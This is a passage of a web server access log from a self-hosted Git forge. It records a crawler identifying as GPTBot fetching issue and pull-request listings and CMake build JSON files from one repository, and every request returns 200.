"https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:19:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2freply%2fcache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 24397] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2freply%2fcache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 24350] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:19:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:19:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9962] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:19:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:47:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:19:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9942] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:19:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=source" [Client 74.7.227.38] [Length 211050] [Gzip 18.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:19:47:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:19:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:47:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9942] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:47:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:47:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:47:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:19:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11118] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=source" [Client 74.7.227.38] [Length 14345] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:19:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14331] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14310] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11144] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:19:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11143] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=source" [Client 74.7.227.38] [Length 14321] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:19:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=source" [Client 74.7.227.38] [Length 14347] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:19:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:19:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14332] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10136] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:19:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10141] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:47:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:47:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10137] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:19:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9962] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9927] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10138] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9951] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:47:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 